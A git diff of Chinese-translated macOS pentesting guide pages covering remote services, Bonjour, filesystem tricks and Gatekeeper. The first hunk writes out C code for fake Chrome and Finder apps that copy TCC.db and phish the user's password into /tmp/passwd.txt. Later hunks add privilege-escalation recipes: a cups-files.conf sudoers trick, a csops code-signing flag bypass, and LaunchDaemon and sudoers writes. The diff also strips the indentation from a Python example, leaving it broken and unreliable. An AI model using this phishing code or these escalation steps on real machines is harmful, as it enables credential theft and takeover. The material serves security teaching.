system(cmd); - return 0; +char *cmd = "open /Applications/Google\\\\ Chrome.app & " +"sleep 2; " +"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " +"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); " +"echo \$PASSWORD > /tmp/passwd.txt"; +system(cmd); +return 0; } EOF @@ -94,22 +91,22 @@ cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> - CFBundleExecutable - Google Chrome - CFBundleIdentifier - com.google.Chrome - CFBundleName - Google Chrome - CFBundleVersion - 1.0 - CFBundleShortVersionString - 1.0 - CFBundleInfoDictionaryVersion - 6.0 - CFBundlePackageType - APPL - CFBundleIconFile - app +CFBundleExecutable +Google Chrome +CFBundleIdentifier +com.google.Chrome +CFBundleName +Google Chrome +CFBundleVersion +1.0 +CFBundleShortVersionString +1.0 +CFBundleInfoDictionaryVersion +6.0 +CFBundlePackageType +APPL +CFBundleIconFile +app EOF @@ -122,18 +119,16 @@ defaults write com.apple.dock persistent-apps -array-add 'tile-data /tmp/Finder.app/Contents/MacOS/Finder.c < int main() { - char *cmd = "open /System/Library/CoreServices/Finder.app & " - "sleep 2; " - "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " - "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); " - "echo \$PASSWORD > /tmp/passwd.txt"; - system(cmd); - return 0; +char *cmd = "open /System/Library/CoreServices/Finder.app & " +"sleep 2; " +"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " +"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); " +"echo \$PASSWORD > /tmp/passwd.txt"; +system(cmd); +return 0; } EOF @@ -175,22 +170,22 @@ cat << EOF > /tmp/Finder.app/Contents/Info.plist "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> - CFBundleExecutable - Finder - CFBundleIdentifier - com.apple.finder - CFBundleName - Finder - CFBundleVersion - 1.0 - CFBundleShortVersionString - 1.0 - CFBundleInfoDictionaryVersion - 6.0 - CFBundlePackageType - APPL - CFBundleIconFile - app +CFBundleExecutable +Finder +CFBundleIdentifier +com.apple.finder +CFBundleName +Finder +CFBundleVersion +1.0 +CFBundleShortVersionString +1.0 +CFBundleInfoDictionaryVersion +6.0 +CFBundlePackageType +APPL +CFBundleIconFile +app EOF @@ -203,17 +198,15 @@ defaults write com.apple.dock persistent-apps -array-add 'tile-data `Sharing` +这些是常见的 macOS 服务,用于远程访问它们。\ +您可以在 `系统设置` --> `共享` 中启用/禁用这些服务。 -- **VNC**, known as “Screen Sharing” (tcp:5900) -- **SSH**, called “Remote Login” (tcp:22) -- **Apple Remote Desktop** (ARD), or “Remote Management” (tcp:3283, tcp:5900) -- **AppleEvent**, known as “Remote Apple Event” (tcp:3031) - -Check if any is enabled running: +- **VNC**,称为“屏幕共享”(tcp:5900) +- **SSH**,称为“远程登录”(tcp:22) +- **Apple Remote Desktop** (ARD),或称为“远程管理”(tcp:3283, tcp:5900) +- **AppleEvent**,称为“远程 Apple 事件”(tcp:3031) +检查是否启用了任何服务,运行: ```bash rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); scrShrng=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.5900" | wc -l); @@ -23,103 +22,90 @@ rAE=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.3031" | wc -l); bmM=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.4488" | wc -l); printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; ``` - ### Pentesting ARD -Apple Remote Desktop (ARD) is an enhanced version of [Virtual Network Computing (VNC)](https://en.wikipedia.org/wiki/Virtual_Network_Computing) tailored for macOS, offering additional features. A notable vulnerability in ARD is its authentication method for the control screen password, which only uses the first 8 characters of the password, making it prone to [brute force attacks](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html) with tools like Hydra or [GoRedShell](https://github.com/ahhh/GoRedShell/), as there are no default rate limits. +Apple Remote Desktop (ARD) 是一个增强版的 [Virtual Network Computing (VNC)](https://en.wikipedia.org/wiki/Virtual_Network_Computing),专为 macOS 量身定制,提供额外功能。ARD 中一个显著的漏洞是其控制屏幕密码的认证方法,仅使用密码的前 8 个字符,使其容易受到 [brute force attacks](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html) 的攻击,使用像 Hydra 或 [GoRedShell](https://github.com/ahhh/GoRedShell/) 这样的工具,因为没有默认的速率限制。 -Vulnerable instances can be identified using **nmap**'s `vnc-info` script. Services supporting `VNC Authentication (2)` are especially susceptible to brute force attacks due to the 8-character password truncation. - -To enable ARD for various administrative tasks like privilege escalation, GUI access, or user monitoring, use the following command: +可以使用 **nmap** 的 `vnc-info` 脚本识别易受攻击的实例。支持 `VNC Authentication (2)` 的服务由于 8 字符密码截断而特别容易受到暴力攻击。 +要启用 ARD 进行各种管理任务,如权限提升、GUI 访问或用户监控,请使用以下命令: ```bash sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -clientopts -setmenuextra -menuextra yes ``` +ARD 提供多种控制级别,包括观察、共享控制和完全控制,且会话在用户密码更改后仍然持续。它允许直接发送 Unix 命令,并以 root 身份执行这些命令,适用于管理用户。任务调度和远程 Spotlight 搜索是显著特性,便于在多台机器上进行远程、低影响的敏感文件搜索。 -ARD provides versatile control levels, including observation, shared control, and full control, with sessions persisting even after user password changes. It allows sending Unix commands directly, executing them as root for administrative users. Task scheduling and Remote Spotlight search are notable features, facilitating remote, low-impact searches for sensitive files across multiple machines. +## Bonjour 协议 -## Bonjour Protocol +Bonjour 是一项由苹果设计的技术,允许 **同一网络上的设备检测彼此提供的服务**。也称为 Rendezvous、**零配置**或 Zeroconf,它使设备能够加入 TCP/IP 网络,**自动选择 IP 地址**,并将其服务广播给其他网络设备。 -Bonjour, an Apple-designed technology, allows **devices on the same network to detect each other's offered services**. Known also as Rendezvous, **Zero Configuration**, or Zeroconf, it enables a device to join a TCP/IP network, **automatically choose an IP address**, and broadcast its services to other network devices. +Bonjour 提供的零配置网络确保设备可以: -Zero Configuration Networking, provided by Bonjour, ensures that devices can: +- **自动获取 IP 地址**,即使在没有 DHCP 服务器的情况下。 +- 执行 **名称到地址的转换**,而无需 DNS 服务器。 +- **发现**网络上可用的服务。 -- **Automatically obtain an IP Address** even in the absence of a DHCP server. -- Perform **name-to-address translation** without requiring a DNS server. -- **Discover services** available on the network. +使用 Bonjour 的设备将从 **169.254/16 范围**中自我分配一个 IP 地址,并验证其在网络上的唯一性。Mac 维护此子网的路由表条目,可以通过 `netstat -rn | grep 169` 验证。 -Devices using Bonjour will assign themselves an **IP address from the 169.254/16 range** and verify its uniqueness on the network. Macs maintain a routing table entry for this subnet, verifiable via `netstat -rn | grep 169`. +对于 DNS,Bonjour 利用 **多播 DNS (mDNS) 协议**。mDNS 在 **port 5353/UDP** 上运行,采用 **标准 DNS 查询**,但目标是 **多播地址 224.0.0.251**。这种方法确保网络上所有监听设备都能接收并响应查询,从而促进其记录的更新。 -For DNS, Bonjour utilizes the **Multicast DNS (mDNS) protocol**. mDNS operates over **port 5353/UDP**, employing **standard DNS queries** but targeting the **multicast address 224.0.0.251**. This approach ensures that all listening devices on the network can receive and respond to the queries, facilitating the update of their records. +加入网络后,每个设备自我选择一个名称,通常以 **.local** 结尾,该名称可能源自主机名或随机生成。 -Upon joining the network, each device self-selects a name, typically ending in **.local**, which may be derived from the hostname or randomly generated. +网络内的服务发现由 **DNS 服务发现 (DNS-SD)** 促进。利用 DNS SRV 记录的格式,DNS-SD 使用 **DNS PTR 记录** 来启用多个服务的列出。寻求特定服务的客户端将请求 `.` 的 PTR 记录,如果该服务在多个主机上可用,则返回格式为 `..` 的 PTR 记录列表。 -Service discovery within the network is facilitated by **DNS Service Discovery (DNS-SD)**. Leveraging the format of DNS SRV records, DNS-SD uses **DNS PTR records** to enable the listing of multiple services. A client seeking a specific service will request a PTR record for `.`, receiving in return a list of PTR records formatted as `..` if the service is available from multiple hosts. +可以使用 `dns-sd` 工具来 **发现和广告网络服务**。以下是其用法的一些示例: -The `dns-sd` utility can be employed for **discovering and advertising network services**. Here are some examples of its usage: - -### Searching for SSH Services - -To search for SSH services on the network, the following command is used: +### 搜索 SSH 服务 +要在网络上搜索 SSH 服务,可以使用以下命令: ```bash dns-sd -B _ssh._tcp ``` +此命令启动对 \_ssh.\_tcp 服务的浏览,并输出详细信息,如时间戳、标志、接口、域、服务类型和实例名称。 -This command initiates browsing for \_ssh.\_tcp services and outputs details such as timestamp, flags, interface, domain, service type, and instance name. - -### Advertising an HTTP Service - -To advertise an HTTP service, you can use: +### 广播 HTTP 服务 +要广播 HTTP 服务,您可以使用: ```bash dns-sd -R "Index" _http._tcp . 80 path=/index.html ``` +此命令在端口 80 上注册一个名为 "Index" 的 HTTP 服务,路径为 `/index.html`。 -This command registers an HTTP service named "Index" on port 80 with a path of `/index.html`. - -To then search for HTTP services on the network: - +然后在网络上搜索 HTTP 服务: ```bash dns-sd -B _http._tcp ``` +当服务启动时,它通过多播其存在向子网中的所有设备宣布其可用性。对这些服务感兴趣的设备无需发送请求,只需监听这些公告。 -When a service starts, it announces its availability to all devices on the subnet by multicasting its presence. Devices interested in these services don't need to send requests but simply listen for these announcements. - -For a more user-friendly interface, the **Discovery - DNS-SD Browser** app available on the Apple App Store can visualize the services offered on your local network. - -Alternatively, custom scripts can be written to browse and discover services using the `python-zeroconf` library. The [**python-zeroconf**](https://github.com/jstasiak/python-zeroconf) script demonstrates creating a service browser for `_http._tcp.local.` services, printing added or removed services: +为了提供更友好的界面,可以在苹果应用商店中使用 **Discovery - DNS-SD Browser** 应用程序可视化您本地网络上提供的服务。 +或者,可以编写自定义脚本使用 `python-zeroconf` 库浏览和发现服务。 [**python-zeroconf**](https://github.com/jstasiak/python-zeroconf) 脚本演示了如何为 `_http._tcp.local.` 服务创建服务浏览器,打印添加或移除的服务: ```python from zeroconf import ServiceBrowser, Zeroconf class MyListener: - def remove_service(self, zeroconf, type, name): - print("Service %s removed" % (name,)) +def remove_service(self, zeroconf, type, name): +print("Service %s removed" % (name,)) - def add_service(self, zeroconf, type, name): - info = zeroconf.get_service_info(type, name) - print("Service %s added, service info: %s" % (name, info)) +def add_service(self, zeroconf, type, name): +info = zeroconf.get_service_info(type, name) +print("Service %s added, service info: %s" % (name, info)) zeroconf = Zeroconf() listener = MyListener() browser = ServiceBrowser(zeroconf, "_http._tcp.local.", listener) try: - input("Press enter to exit...\n\n") +input("Press enter to exit...\n\n") finally: - zeroconf.close() +zeroconf.close() ``` +### 禁用 Bonjour -### Disabling Bonjour - -If there are concerns about security or other reasons to disable Bonjour, it can be turned off using the following command: - +如果出于安全考虑或其他原因需要禁用 Bonjour,可以使用以下命令将其关闭: ```bash sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist ``` - -## References +## 参考文献 - [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=) - [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index 720583358..ed4c3bd4e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -7,8 +7,8 @@ **目录**中的权限: - **读取** - 你可以 **枚举** 目录条目 -- **写入** - 你可以 **删除/写入** 目录中的 **文件**,并且你可以 **删除空文件夹**。 -- 但是你 **不能删除/修改非空文件夹**,除非你对其拥有写入权限。 +- **写入** - 你可以 **删除/写入** **文件** 在目录中,并且你可以 **删除空文件夹**。 +- 但你 **不能删除/修改非空文件夹**,除非你对其拥有写入权限。 - 你 **不能修改文件夹的名称**,除非你拥有它。 - **执行** - 你被 **允许遍历** 目录 - 如果你没有这个权限,你无法访问其中的任何文件或任何子目录。 @@ -17,23 +17,29 @@ **如何覆盖一个由 root 拥有的文件/文件夹**,但: - 路径中的一个父 **目录所有者** 是用户 -- 路径中的一个父 **目录所有者** 是具有 **写入访问** 的 **用户组** +- 路径中的一个父 **目录所有者** 是一个具有 **写入访问** 的 **用户组** - 一个用户 **组** 对 **文件** 具有 **写入** 访问 -在任何之前的组合中,攻击者可以 **注入** 一个 **符号/硬链接** 到预期路径,以获得特权的任意写入。 +在任何之前的组合中,攻击者可以 **注入** 一个 **符号/硬链接** 到预期路径以获得特权任意写入。 ### 文件夹 root R+X 特殊情况 -如果在一个 **目录** 中有文件,**只有 root 拥有 R+X 访问权限**,那么这些文件对 **其他任何人** 都是 **不可访问的**。因此,允许 **将一个用户可读的文件** 移动的漏洞,因该 **限制** 而无法读取,从这个文件夹 **到另一个文件夹**,可能被滥用以读取这些文件。 +如果在一个 **目录** 中有文件,**只有 root 拥有 R+X 访问权限**,那么这些文件对 **其他任何人都不可访问**。因此,允许 **将一个用户可读的文件** 移动的漏洞,因该 **限制** 而无法读取,从这个文件夹 **到另一个文件夹**,可能被滥用以读取这些文件。 示例在:[https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions) ## 符号链接 / 硬链接 -如果一个特权进程正在写入一个 **文件**,该文件可能被 **低特权用户控制**,或者可能是 **之前由低特权用户创建**。用户可以通过符号链接或硬链接 **指向另一个文件**,特权进程将写入该文件。 +### 宽松的文件/文件夹 + +如果一个特权进程正在写入一个 **文件**,该文件可能被 **低特权用户控制**,或者可能是 **之前由低特权用户创建**。用户可以通过符号链接或硬链接 **指向另一个文件**,而特权进程将写入该文件。 查看其他部分,攻击者可能 **滥用任意写入以提升特权**。 +### 打开 `O_NOFOLLOW` + +当 `open` 函数使用标志 `O_NOFOLLOW` 时,不会跟随最后路径组件中的符号链接,但会跟随路径的其余部分。防止在路径中跟随符号链接的正确方法是使用标志 `O_NOFOLLOW_ANY`。 + ## .fileloc 具有 **`.fileloc`** 扩展名的文件可以指向其他应用程序或二进制文件,因此当它们被打开时,执行的将是该应用程序/二进制文件。\ @@ -50,11 +56,15 @@ ``` -## 任意文件描述符 +## 文件描述符 -如果您可以让一个 **进程以高权限打开一个文件或文件夹**,您可以利用 **`crontab`** 以 **`EDITOR=exploit.py`** 打开 `/etc/sudoers.d` 中的一个文件,这样 `exploit.py` 将获得对 `/etc/sudoers` 中文件的文件描述符并加以利用。 +### 泄漏 FD (没有 `O_CLOEXEC`) -例如: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098) +如果调用 `open` 时没有标志 `O_CLOEXEC`,文件描述符将被子进程继承。因此,如果一个特权进程打开一个特权文件并执行一个由攻击者控制的进程,攻击者将 **继承对特权文件的 FD**。 + +如果你能让一个 **进程以高权限打开一个文件或文件夹**,你可以利用 **`crontab`** 在 `/etc/sudoers.d` 中打开一个文件,使用 **`EDITOR=exploit.py`**,这样 `exploit.py` 将获得对 `/etc/sudoers` 中文件的 FD 并加以利用。 + +例如: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098),代码: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging ## 避免隔离 xattrs 技巧 @@ -64,7 +74,7 @@ xattr -d com.apple.quarantine /path/to/file_or_app ``` ### uchg / uchange / uimmutable 标志 -如果一个文件/文件夹具有此不可变属性,则无法在其上设置 xattr。 +如果一个文件/文件夹具有此不可变属性,则无法在其上放置 xattr。 ```bash echo asd > /tmp/asd chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd" @@ -110,13 +120,13 @@ ls -le /tmp/test ``` ### **com.apple.acl.text xattr + AppleDouble** -**AppleDouble** 文件格式复制一个文件及其 ACE。 +**AppleDouble** 文件格式复制一个文件及其 ACEs。 在 [**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) 中可以看到,存储在名为 **`com.apple.acl.text`** 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此,如果你将一个应用程序压缩成一个带有 ACL 的 **AppleDouble** 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到应用程序中: 查看 [**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) 以获取更多信息。 -要复制这个,我们首先需要获取正确的 acl 字符串: +要复制这一点,我们首先需要获取正确的 acl 字符串: ```bash # Everything will be happening here mkdir /tmp/temp_xattrs @@ -142,9 +152,30 @@ Not really needed but I leave it there just in case: macos-xattr-acls-extra-stuff.md {{#endref}} +## 绕过签名检查 + +### 绕过平台二进制检查 + +一些安全检查会检查二进制文件是否为 **平台二进制**,例如允许连接到 XPC 服务。然而,如在 https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ 中所述,可以通过获取一个平台二进制(如 /bin/ls)并通过 dyld 使用环境变量 `DYLD_INSERT_LIBRARIES` 注入漏洞来绕过此检查。 + +### 绕过标志 `CS_REQUIRE_LV` 和 `CS_FORCED_LV` + +执行中的二进制文件可以修改其自身的标志,以通过如下代码绕过检查: +```c +// Code from https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ +int pid = getpid(); +NSString *exePath = NSProcessInfo.processInfo.arguments[0]; + +uint32_t status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0)); +status |= 0x2000; // CS_REQUIRE_LV +csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS + +status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0)); +NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status); +``` ## 绕过代码签名 -Bundles 包含文件 **`_CodeSignature/CodeResources`**,其中包含每个 **file** 在 **bundle** 中的 **hash**。请注意,CodeResources 的 hash 也 **嵌入在可执行文件中**,因此我们也不能对其进行修改。 +Bundles 包含文件 **`_CodeSignature/CodeResources`**,该文件包含 **bundle** 中每个 **file** 的 **hash**。请注意,CodeResources 的 hash 也 **嵌入在可执行文件中**,因此我们也不能对其进行修改。 然而,有一些文件的签名不会被检查,这些文件在 plist 中具有 omit 键,例如: ```xml @@ -190,7 +221,7 @@ Bundles 包含文件 **`_CodeSignature/CodeResources`**,其中包含每个 **f ... ``` -可以通过命令行计算资源的签名: +可以通过命令行计算资源的签名,方法是: ```bash openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64 ``` @@ -230,7 +261,7 @@ hdiutil create -srcfolder justsome.app justsome.dmg ### 守护进程 -编写一个任意的 **LaunchDaemon**,例如 **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**,其中 plist 执行一个任意脚本,如: +编写一个任意的 **LaunchDaemon**,如 **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**,其中 plist 执行一个任意脚本,如: ```xml @@ -251,7 +282,7 @@ hdiutil create -srcfolder justsome.app justsome.dmg ### Sudoers 文件 -如果您具有 **任意写入** 权限,您可以在 **`/etc/sudoers.d/`** 文件夹内创建一个文件,从而授予自己 **sudo** 权限。 +如果您具有 **任意写入** 权限,您可以在 **`/etc/sudoers.d/`** 文件夹中创建一个文件,授予自己 **sudo** 权限。 ### PATH 文件 @@ -259,9 +290,29 @@ hdiutil create -srcfolder justsome.app justsome.dmg 您还可以在 **`/etc/paths.d`** 中写入文件,以将新文件夹加载到 `PATH` 环境变量中。 -## 以其他用户身份生成可写文件 +### cups-files.conf -这将生成一个属于 root 的文件,该文件对我可写 ([**code from here**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh))。这也可能作为特权提升工作: +此技术在 [this writeup](https://www.kandji.io/blog/macos-audit-story-part1) 中使用。 + +创建文件 `/etc/cups/cups-files.conf`,内容如下: +``` +ErrorLog /etc/sudoers.d/lpe +LogFilePerm 777 + +``` +这将创建文件 `/etc/sudoers.d/lpe`,权限为 777。末尾的额外垃圾是为了触发错误日志的创建。 + +然后,在 `/etc/sudoers.d/lpe` 中写入所需的配置以提升权限,如 `%staff ALL=(ALL) NOPASSWD:ALL`。 + +然后,再次修改文件 `/etc/cups/cups-files.conf`,指示 `LogFilePerm 700`,以便新的 sudoers 文件在调用 `cupsctl` 时变得有效。 + +### 沙箱逃逸 + +可以通过 FS 任意写入来逃逸 macOS 沙箱。有关一些示例,请查看页面 [macOS Auto Start](../../../../macos-auto-start-locations.md),但一个常见的例子是在 `~/Library/Preferences/com.apple.Terminal.plist` 中写入一个终端首选项文件,该文件在启动时执行一个命令,并使用 `open` 调用它。 + +## 生成可写文件作为其他用户 + +这将生成一个属于 root 的文件,我可以写入([**代码来自这里**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh))。这也可能作为权限提升有效: ```bash DIRNAME=/usr/local/etc/periodic/daily @@ -373,7 +424,7 @@ return 0; **macOS 受保护描述符** 是在 macOS 中引入的一项安全功能,旨在增强用户应用程序中 **文件描述符操作** 的安全性和可靠性。这些受保护的描述符提供了一种将特定限制或“保护”与文件描述符关联的方法,这些限制由内核强制执行。 -此功能特别有助于防止某些类型的安全漏洞,例如 **未经授权的文件访问** 或 **竞争条件**。这些漏洞发生在例如一个线程正在访问一个文件描述符,导致 **另一个脆弱线程对其的访问**,或者当一个文件描述符被 **继承** 给一个脆弱的子进程时。与此功能相关的一些函数包括: +此功能特别有助于防止某些类别的安全漏洞,例如 **未经授权的文件访问** 或 **竞争条件**。这些漏洞发生在例如一个线程正在访问一个文件描述符,导致 **另一个脆弱线程对其的访问**,或者当一个文件描述符被 **继承** 给一个脆弱的子进程时。与此功能相关的一些函数包括: - `guarded_open_np`: 以保护方式打开文件描述符 - `guarded_close_np`: 关闭它 diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index 8c25dede8..4ae07d3e6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md @@ -2,17 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} - ## Gatekeeper -**Gatekeeper** 是为 Mac 操作系统开发的安全功能,旨在确保用户 **仅运行受信任的软件**。它通过 **验证用户下载并尝试从 App Store 以外的来源打开的软件** 来实现,例如应用程序、插件或安装包。 +**Gatekeeper** 是为 Mac 操作系统开发的安全功能,旨在确保用户 **仅运行受信任的软件**。它通过 **验证软件** 来实现,用户下载并尝试从 **App Store 以外的来源** 打开软件,例如应用程序、插件或安装包。 -Gatekeeper 的关键机制在于其 **验证** 过程。它检查下载的软件是否 **由认可的开发者签名**,以确保软件的真实性。此外,它还确认该软件是否 **经过 Apple 的公证**,以确认其不含已知的恶意内容,并且在公证后未被篡改。 +Gatekeeper 的关键机制在于其 **验证** 过程。它检查下载的软件是否 **由认可的开发者签名**,以确保软件的真实性。此外,它还确认该软件是否 **经过 Apple 的公证**,以确认其不含已知恶意内容,并且在公证后未被篡改。 -此外,Gatekeeper 通过 **提示用户批准首次打开** 下载的软件来增强用户控制和安全性。此保护措施有助于防止用户无意中运行可能有害的可执行代码,这些代码可能被误认为是无害的数据文件。 +此外,Gatekeeper 通过 **提示用户批准首次打开** 下载的软件来增强用户控制和安全性。此保护措施有助于防止用户无意中运行可能有害的可执行代码,而将其误认为无害的数据文件。 ### 应用程序签名 @@ -20,17 +16,17 @@ Gatekeeper 的关键机制在于其 **验证** 过程。它检查下载的软件 其工作原理如下: -1. **签名应用程序:** 当开发者准备分发他们的应用程序时,他们 **使用私钥签名应用程序**。此私钥与 **Apple 在开发者注册 Apple Developer Program 时向开发者发放的证书** 相关联。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发者的私钥加密此哈希。 +1. **签名应用程序:** 当开发者准备分发其应用程序时,他们 **使用私钥签名应用程序**。此私钥与 **Apple 在开发者注册 Apple Developer Program 时向开发者颁发的证书** 相关联。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发者的私钥加密此哈希。 2. **分发应用程序:** 签名的应用程序随后与开发者的证书一起分发给用户,该证书包含相应的公钥。 -3. **验证应用程序:** 当用户下载并尝试运行应用程序时,他们的 Mac 操作系统使用开发者证书中的公钥解密哈希。然后,它根据应用程序的当前状态重新计算哈希,并将其与解密后的哈希进行比较。如果它们匹配,则意味着 **自开发者签名以来,应用程序未被修改**,系统允许应用程序运行。 +3. **验证应用程序:** 当用户下载并尝试运行应用程序时,他们的 Mac 操作系统使用开发者证书中的公钥解密哈希。然后,它根据应用程序的当前状态重新计算哈希,并将其与解密后的哈希进行比较。如果它们匹配,则意味着 **自开发者签名以来,应用程序未被修改**,系统允许该应用程序运行。 -应用程序签名是 Apple Gatekeeper 技术的重要组成部分。当用户尝试 **打开从互联网下载的应用程序** 时,Gatekeeper 会验证应用程序签名。如果它是由 Apple 向已知开发者发放的证书签名,并且代码未被篡改,Gatekeeper 允许应用程序运行。否则,它会阻止应用程序并提醒用户。 +应用程序签名是 Apple Gatekeeper 技术的重要组成部分。当用户尝试 **打开从互联网下载的应用程序** 时,Gatekeeper 会验证应用程序签名。如果它是由 Apple 向已知开发者颁发的证书签名,并且代码未被篡改,Gatekeeper 允许该应用程序运行。否则,它会阻止该应用程序并提醒用户。 -从 macOS Catalina 开始,**Gatekeeper 还检查应用程序是否经过 Apple 的公证**,增加了一层额外的安全性。公证过程检查应用程序是否存在已知的安全问题和恶意代码,如果这些检查通过,Apple 会向应用程序添加一个 Gatekeeper 可以验证的票据。 +从 macOS Catalina 开始,**Gatekeeper 还检查应用程序是否经过 Apple 的公证**,增加了一层额外的安全性。公证过程检查应用程序是否存在已知安全问题和恶意代码,如果这些检查通过,Apple 会向应用程序添加一个 Gatekeeper 可以验证的票据。 #### 检查签名 -在检查某些 **恶意软件样本** 时,您应始终 **检查二进制文件的签名**,因为 **签名** 它的 **开发者** 可能已经 **与恶意软件相关**。 +在检查某些 **恶意软件样本** 时,您应始终 **检查二进制文件的签名**,因为 **签名** 的 **开发者** 可能已经 **与恶意软件相关**。 ```bash # Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -49,18 +45,18 @@ codesign -s toolsdemo ``` ### Notarization -苹果的 notarization 过程作为额外的保护措施,旨在保护用户免受潜在有害软件的影响。它涉及 **开发者提交他们的应用程序进行审查**,由 **苹果的 Notary Service** 进行,这与应用审核不应混淆。该服务是一个 **自动化系统**,对提交的软件进行审查,以检查是否存在 **恶意内容** 和任何潜在的代码签名问题。 +苹果的 notarization 过程作为额外的保护措施,旨在保护用户免受潜在有害软件的影响。它涉及 **开发者提交他们的应用程序进行审查**,由 **苹果的 Notary Service** 进行,这与应用审核不应混淆。该服务是一个 **自动化系统**,对提交的软件进行审查,以检查是否存在 **恶意内容** 以及代码签名的任何潜在问题。 -如果软件 **通过** 了此检查而没有引发任何问题,Notary Service 将生成一个 notarization ticket。开发者需要 **将此票据附加到他们的软件**,这个过程称为“stapling”。此外,notarization ticket 还会在线发布,Gatekeeper,苹果的安全技术,可以访问它。 +如果软件 **通过** 了此检查而没有引发任何问题,Notary Service 将生成一个 notarization 票据。开发者需要 **将此票据附加到他们的软件上**,这个过程称为“stapling”。此外,notarization 票据还会在线发布,Gatekeeper,苹果的安全技术,可以访问它。 